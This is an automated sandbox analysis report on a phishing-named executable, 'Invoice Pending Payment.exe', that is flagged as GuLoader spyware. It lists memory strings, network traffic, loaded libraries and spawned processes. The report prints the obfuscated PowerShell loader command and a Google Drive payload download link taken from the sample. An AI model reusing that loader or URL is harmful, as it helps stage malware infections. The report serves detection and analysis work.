Source: msiexec.exe, 00000006.00000002.2965290125.000000002165B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBdq
Source: powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000006.00000002.2952367265.00000000057EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000006.00000002.2952367265.00000000057EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2963838708.0000000020A10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_
Source: msiexec.exe, 00000006.00000003.2263344793.0000000005896000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2263245757.000000000585A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2952367265.0000000005858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000006.00000002.2952367265.00000000057EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000006.00000002.2965290125.000000002155D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.00000000214ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2965290125.00000000214ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000006.00000002.2965290125.000000002155D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021518000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2965290125.00000000215A8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002271D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022820000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022579000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.2966930577.00000000225C9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022554000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000227FB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000226F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022723000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002257F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.2965290125.00000000215A8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002271D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022820000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022579000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000225EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000006.00000002.2966930577.00000000225C9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022554000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000227FB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.00000000226F8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.0000000022723000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2966930577.000000002257F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/X
Source: msiexec.exe, 00000006.00000002.2965290125.000000002168C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBdq

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49828 version: TLS 1.2

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_00404F90 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404F90

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice Pending Payment.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_004030B8 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004030B8

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_00406141	0_2_00406141
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_004047CF	0_2_004047CF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253D278	6_2_0253D278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02535370	6_2_02535370
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253C146	6_2_0253C146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253C738	6_2_0253C738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253C468	6_2_0253C468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253CA08	6_2_0253CA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253E988	6_2_0253E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253CFAC	6_2_0253CFAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253CCD8	6_2_0253CCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02537118	6_2_02537118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02533AA1	6_2_02533AA1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253F974	6_2_0253F974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0253E97C	6_2_0253E97C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_025329EC	6_2_025329EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02539DE0	6_2_02539DE0

Source: Invoice Pending Payment.exe

Static PE information: invalid certificate

Source: Invoice Pending Payment.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/15@5/5

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_00404293 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404293

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar,

0_2_00402036

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

File created: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

File created: C:\Users\user\AppData\Local\Temp\nspA543.tmp

Jump to behavior

Source: Invoice Pending Payment.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Invoice Pending Payment.exe	ReversingLabs: Detection: 23%
Source: Invoice Pending Payment.exe	Virustotal: Detection: 28%

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

File read: C:\Users\user\Desktop\Invoice Pending Payment.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Invoice Pending Payment.exe "C:\Users\user\Desktop\Invoice Pending Payment.exe"
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.2087345934.000000000A5BE000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Bortvejredes $Systemisable $Miljstttes), (Fiskeriterritoriets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Bagatelgrnse = [AppDomain]::CurrentDomain.Get
